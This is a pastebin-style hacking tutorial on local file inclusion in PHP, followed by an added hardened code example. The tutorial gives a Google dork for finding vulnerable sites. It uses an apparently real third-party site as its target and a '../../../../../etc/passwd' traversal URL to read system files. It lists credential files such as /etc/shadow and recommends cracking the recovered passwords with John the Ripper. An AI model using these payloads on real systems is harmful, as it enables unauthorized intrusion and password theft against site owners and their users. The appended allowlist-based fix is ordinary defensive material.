87aCk_X

L0C@l f!l3 inclu$ioN

Aug 30th, 2013
  1. ...::Local File Inclusion (LFI)::...
  2.  
  3. First of all, here is an example of vulnerable PHP code:
  4. Code:
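  5. <?php $page = $_GET['page'];  // value taken straight from the URL, never validated
  6. include($page);                // vulnerable: includes whatever path was requested
  7. ?>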
  8.  
  9. Now, here's a Google dork:
  10. Code:
  11. inurl:redirect.php?page=
  12.  
  13. Search that in Google, and you should come up with a link like this:
  14. Code:
  15. http://www.x17agency.com/redirect.php?page=_CLI/contact.php
  16.  
  17. To test if it's vulnerable, please put this code in:
  18. Code:
  19. http://www.x17agency.com/redirect.php?page=../../../../../etc/passwd
  20.  
  21. After you have put that code in, which is "../../../../../etc/passwd", a vulnerable page should come back with the contents of the server's /etc/passwd file.
  22.  
  25.  
  26. A non-shadowed file would look like this:
  27. Code:
  28. username:passwd:UID:GID:full_name:directory:shell
  29.  
  30. All you have to do is decode the password.
  31.  
  32. Here are some "interesting" places you might want to visit:
  33. Code:
  34. /etc/passwd
  35. /etc/shadow
  36. /etc/group
  37. /etc/security/group
  38. /etc/security/passwd
  39. /etc/security/user
  40. /etc/security/environ
  41. /etc/security/limits
  42. /usr/lib/security/mkuser.default
  43.  
  44. Q&A
  45. How to decode the pass?
  46. Use John the Ripper's decoder :)
  47.  
  48. HAPPY HACKING ;D
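
Added example, not part of the original paste: a hardened replacement for the vulnerable include($page) shown at the top. The pages directory and the page names (home, contact) are assumptions made for illustration.

```php
<?php
// Added example: the request value is only ever used as a lookup key,
// never as a file path. PAGES_DIR and the PAGES entries are assumed names.

const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: public page key => file name under PAGES_DIR.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Map a requested page key to an absolute file path, or null if rejected.
 */
function resolve_page(string $key): ?string
{
    // 1. Reject anything not in the allowlist. "../../../../../etc/passwd"
    //    is not a key, so it never reaches the filesystem.
    if (!array_key_exists($key, PAGES)) {
        return null;
    }

    // 2. Defence in depth: canonicalise the path (resolves ".." and symlinks)
    //    and confirm the result still sits inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the pages directory
    }
    return $path;
}

// ?page[]=x makes $_GET['page'] an array, so check the type first.
$key  = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : 'home';
$path = resolve_page($key);
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

In php.ini, open_basedir and allow_url_include = Off limit what any include() that was missed can reach.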